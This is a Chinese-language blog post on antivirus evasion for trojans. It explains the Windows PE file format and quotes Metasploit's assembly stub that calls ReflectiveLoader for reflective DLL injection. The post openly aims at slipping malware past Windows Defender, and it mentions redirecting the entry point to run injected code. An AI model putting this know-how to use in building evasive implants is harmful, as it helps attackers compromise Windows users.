黑客攻击-木马免杀之PE文件

当你好不容易弄出来一个木马(具体可参考这里)的时候，却被杀毒软件轻易的就检测出来了，那一切岂不是白费了。Win10中的windows defender基于流量检测很容易把常见的木马程序检测出来，那怎么绕过这些检测？

对于此问题，打算开一个专题进行木马免杀的分析，先从最最重要的PE文件说起，要攻击Windows系统，如果不懂PE文件，面对杀毒软件，则只能束手就擒了。

PE文件

PE（Portable Execute）文件是Windows下可执行文件的总称，常见的有DLL，EXE，OCX，SYS等，事实上，一个文件是否是PE文件与其扩展名无关，PE文件可以是任何扩展名

PE全称是Portable Execute，实际上，这种文件格式没有做到Portable Execute，只能用在Windwos。

基本结构

32位PE的基本结构如下，64位的大同小异。
如下是qq的16进制打开后解析出相应的字段，和上图是匹配的。

Dos文件头和Dos块

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE headerWORD   e_magic;                     // Magic numberWORD   e_cblp;                      // Bytes on last page of fileWORD   e_cp;                        // Pages in fileWORD   e_crlc;                      // RelocationsWORD   e_cparhdr;                   // Size of header in paragraphsWORD   e_minalloc;                  // Minimum extra paragraphs neededWORD   e_maxalloc;                  // Maximum extra paragraphs neededWORD   e_ss;                        // Initial (relative) SS valueWORD   e_sp;                        // Initial SP valueWORD   e_csum;                      // ChecksumWORD   e_ip;                        // Initial IP valueWORD   e_cs;                        // Initial (relative) CS valueWORD   e_lfarlc;                    // File address of relocation tableWORD   e_ovno;                      // Overlay numberWORD   e_res[4];                    // Reserved wordsWORD   e_oemid;                     // OEM identifier (for e_oeminfo)WORD   e_oeminfo;                   // OEM information; e_oemid specificWORD   e_res2[10];                  // Reserved wordsLONG   e_lfanew;                    // File address of new exe header} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

对于PE文件来说，有用的是最后一个字段，这个字段指出了真正的PE头在文件中的位置。

PE文件头

typedef struct _IMAGE_NT_HEADERS {DWORD Signature;IMAGE_FILE_HEADER FileHeader;IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Signature是00004550h，也就是字符’P’和’E’。对于OptionalHeader尽管按照字面的理解是可选的，实际上在每一个PE文件中都是需要的。
每个结构体的具体信息如下：

IMAGE_FILE_HEADER 最后一个字段Characteristics代表文件的属性。如果是PE文件，这个字段的值是010fh，如果是dll文件，这个字段的值是210eh。
IMAGE_OPTIONAL_HEADER32

AddressOfEntryPoint指出文件被执行时的入口地址，这个地址是RVA(稍后会介绍)。如果像在程序运行前执行一段程序，那么可以把这个入口地址指向你想执行的程序。
ImageBase指出文件优先载入的地址，一般exe默认优先装入的地址是400000h，而dll是10000000h
SectionAlignment指定了节被装入内存后的对齐单位，FileAlignment指定了节存储在磁盘文件时的对齐单位
DataDirectory 很重要的结构，由16个相同的IMAGE_DATA_DIRECTORY结构组成。其中有导入表、导出表、资源表数据块。

节表和节

Windows装载器在装载DOS部分，PE文件头部分和节表头部分不进行任何处理，而装载节的时候根据节的属性做不同的处理。下图展示了PE文件到内存的映射。

节表

VirtualAddress指出节被装载到内存后的偏移位置
PointerToRawData指出节在磁盘文件中所处的位置

RVA和文件偏移的转换

RVA应该时PE文件相关最重要的概念了，导入表导出表等的定位都需要用到RVA。

下图展示了RVA的含义：

相关计算：

msf中巧妙调用ReflectiveLoader

在msf中，反射dll注入使用的非常普遍。这段代码后续会详细讲解，这是msf远程控制最核心的一段代码，“小马”（stager）拉"大马"（stage）得以实现，基于的就是这段代码。

  def asm_invoke_dll(opts={})asm = %Q^; prologuedec ebp               ; 'M'pop edx               ; 'Z'call $+5              ; call next instructionpop ebx               ; get the current location (+7 bytes)push edx              ; restore edxinc ebp               ; restore ebppush ebp              ; save ebp for latermov ebp, esp          ; set up a new stack frame; Invoke ReflectiveLoader(); add the offset to ReflectiveLoader() (0x????????)add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}call ebx              ; invoke ReflectiveLoader(); Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)push edi              ; push the socket handlepush 4                ; indicate that we have attachedpush eax              ; push some arbitrary value for hInstancemov ebx, eax          ; save DllMain for another callcall ebx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket); Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk); push the exitfunk value onto the stackpush #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}push 5                ; indicate that we have detachedpush eax              ; push some arbitrary value for hInstancecall ebx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)^end

其中 add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)} 用来获取ReflectiveLoader的虚拟地址。rdi_offset获取的是ReflectiveLoader的RVA地址。这段代码翻译过来就是ebx-7 = 基址，然后再加上RVA就得到了ReflectiveLoader的虚拟地址。

公众号

更多内容，欢迎关注我的公众号：无情剑客。